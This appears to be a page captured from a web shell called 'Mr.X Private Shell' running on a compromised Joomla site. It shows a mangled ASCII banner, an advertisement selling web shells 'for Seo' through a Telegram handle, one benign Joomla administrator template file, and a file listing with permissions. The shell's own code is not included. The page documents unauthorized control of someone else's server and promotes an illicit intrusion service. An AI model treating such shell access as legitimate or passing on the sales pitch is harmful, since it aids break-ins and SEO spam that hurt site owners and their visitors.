__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package Joomla.Administrator
* @subpackage Templates.Atum
*
* @copyright (C) 2019 Open Source Matters, Inc. <https://www.joomla.org>
* @license GNU General Public License version 2 or later; see LICENSE.txt
*
* Module chrome for rendering the module in a submenu
*/
defined('_JEXEC') or die;
$module = $displayData['module'];
if ((string) $module->content === '') {
return;
}
?>
<div class="card-header">
<h6><?php echo $module->title; ?></h6>
</div>
<?php echo $module->content; ?>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| body.php | File | 3.21 KB | 0664 |
|
| header-item.php | File | 496 B | 0664 |
|
| title.php | File | 528 B | 0664 |
|
| well.php | File | 3.9 KB | 0664 |
|